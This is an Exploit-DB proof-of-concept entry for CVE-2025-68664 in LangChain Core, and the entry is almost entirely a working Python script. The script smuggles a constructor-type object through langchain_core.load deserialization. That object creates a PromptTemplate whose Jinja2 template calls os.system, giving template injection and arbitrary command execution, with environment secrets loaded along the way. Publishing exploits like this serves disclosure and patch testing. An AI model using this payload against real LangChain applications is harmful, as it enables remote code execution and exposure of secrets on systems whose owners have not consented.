LangChain Core 1.2.4 - SSTI/RCE

EDB-ID:

52514


Author:

banyamer

Type:

webapps


Platform:

Multiple

Date:

2026-04-29


# Exploit Title: LangChain Core - SSTI/RCE 
# Date: 2025-12-29
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Contact: @banyamer_security (Instagram)
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.langchain.com/
# Software Link: https://pypi.org/project/langchain-core/
# Version: < 0.3.81 and < 1.2.5
# Tested on: Python 3.10 - 3.12
# CVE : CVE-2025-68664
# Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate
#              with Jinja2 format, leading to Server-Side Template Injection and arbitrary command execution.

import os
from langchain_core.load import dumps, load
from langchain_core.prompts import PromptTemplate

# Set a dummy env var (demonstrates potential secret access if needed)
os.environ["TEST_SECRET"] = "secret_value_123"

# Malicious constructor payload targeting PromptTemplate with SSTI
payload = {
    "exploit": {
        "lc": 1,
        "type": "constructor",
        "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
        "kwargs": {
            "input_variables": [],
            "template": "{{ config.get('callbacks', {}).get('__builtins__', {}).get('__import__', lambda x: __import__(x))('os').system('id') }}",
            "template_format": "jinja2"
        }
    }
}

# Serialize (dumps does not escape 'lc' key)
serialized = dumps(payload)

# Deserialize - instantiates the malicious PromptTemplate
deserialized = load(serialized, secrets_from_env=True)

# Extract and invoke the malicious prompt → triggers SSTI → RCE
malicious = deserialized["exploit"]
output = malicious.format()

print("[*] Command execution output:")
print(output)